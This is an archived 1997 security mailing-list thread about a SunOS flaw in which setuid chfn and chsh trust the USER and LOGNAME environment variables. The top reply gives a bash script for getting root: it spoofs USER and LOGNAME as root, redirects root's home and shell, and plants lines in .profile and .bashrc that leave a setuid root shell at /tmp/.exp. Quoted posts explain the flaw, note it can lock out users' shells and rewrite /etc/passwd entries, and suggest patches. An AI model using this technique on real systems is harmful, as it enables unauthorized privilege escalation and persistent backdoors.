Interim solution for ps

[blind () SEDATED NET (Trevor Linton)]

Here's a ruff script to get root, this is more then a algorithm
then a working script but in "theory" will work.  This will work
if chsh and chfn is +s'ed.  And if they use getenv.

------ CUT ------
#!/bin/bash
#
#  Very basic, i need a way to set root shell to /tmp/.tmp
#  chfn on some systems will set the directory on some it wont.
#  depends.. :\
#
#  patch:
#    1) -s both chfn and chsh
#    2) edit the source code for chfn and chsh and remove
#       getenv("LOGNAME") and or getenv("USER") and replace
#       with getuid(); ..
#
mkdir -f /tmp/.tmp
export USER="root"
export LOGNAME="root"
echo Set the HOME DIRECTORY RIGHT NOW TO /tmp/.tmp
chfn
echo "Set the SHELL TO /bin/bash!"
chsh
echo "cp -a /bin/sh /tmp/.exp" >> /tmp/.tmp/.profile
echo "cp -a /bin/sh /tmp/.exp" >> /tmp/.tmp/.bashrc
echo "chown root.root /tmp/.exp" >> /tmp/.tmp/.bashrc
echo "chown root.root /tmp/.exp" >> /tmp/.tmp/.profile
echo "chmod a+sx /tmp/.exp" >> /tmp/.tmp/.bashrc
echo "chmod a+sx /tmp/.exp" >> /tmp/.tmp/.profile
echo "Exploit set, wait a day then log back on and execute"
echo "/tmp/.exp to get root, /tmp/.exp is a sh shell when"
echo "root logs in it'll be +s'ed"
-----------------

blind - blind () root hax0r org support () hax0r org
Swingin' Utters. a juvenile product of the working class.


On Mon, 19 May 1997, Nick Simicich wrote:

> Of course, if Bash was changed, I could change them from perl, or a C
> program, and then run bash out of my C program or Perl.
>
> You were right the first time - sdon't trust your environment unless you
> control it.
>
> On Sun, 18 May 1997, Trevor Linton wrote:
>
> > Date: Sun, 18 May 1997 13:36:00 +0000
> > From: Trevor Linton <blind () SEDATED NET>
> > To: best-of-security () suburbia net
> > Subject: BoS:      SunOS exploit.
> > Resent-Date: Tue, 20 May 1997 09:21:05 +1000 (EST)
> > Resent-From: best-of-security () suburbia net
> >
> >
> > On sunos, if you execute a clean bash shell then type, export USER="root"
> > then USER=$LOGNAME, then execute chsh root or chfn root you can change
> > the root information.
> >
> >  Why?
> >
> >  Well first off chsh and chfn are +s'ed.  This is a bad idea in the first
> > Place, Second off chsh and chfn use the function getenv("USER") most
> > programs bother to use this instead of geteuid(); getenv("USER") reports
> > that the user is root (while geteuid(); would report the real userid) and
> > then since chsh and or chfn is +s'ed it'll change root's shell user
> > information or ANYONE on the system's information!
> >
> >  On the SunOS system i have i've been able to lock out ANYONES shell
> > using this exploit and locking out root's shell as well as changing
> > anyones NAME info in /etc/passwd etc.. etc.. any program that uses
> > getenv("USER") is vunerable (that's in bash). tcsh and some other
> > shells i remember don't allow USER and LOGNAME modifying. :\
> >
> >  Anyways here's a rough patch:
> >         1) -s the programs that use getenv(); such as chsh and chfn
> >         2) remove getenv() and replace it with geteuid();
> >         3) possibly get the programmers of bash to fix it so USER and
> >            LOGNAME can't be modified unless it's super-user.
> >
> > I'm sure theres a way to get root from this exploit butta.. :) oh well.
> >
> > Trevor Linton (blind) - blind () sedated net support () hax0r org
> > Swingin' Utters. a juvenile product of the working class.
> >
> > "People who are having trouble communicating should just shuttup"
>
> Of course my password is the same as my pet's name.
> My macaw's name was Q47pY!3, but I change it every 90 days.
> Nick Simicich mailto:njs () scifi squawk com or (last choice) mailto:njs () us ibm com
> http://scifi.squawk.com/njs.html -- Stop by and Light Up The World!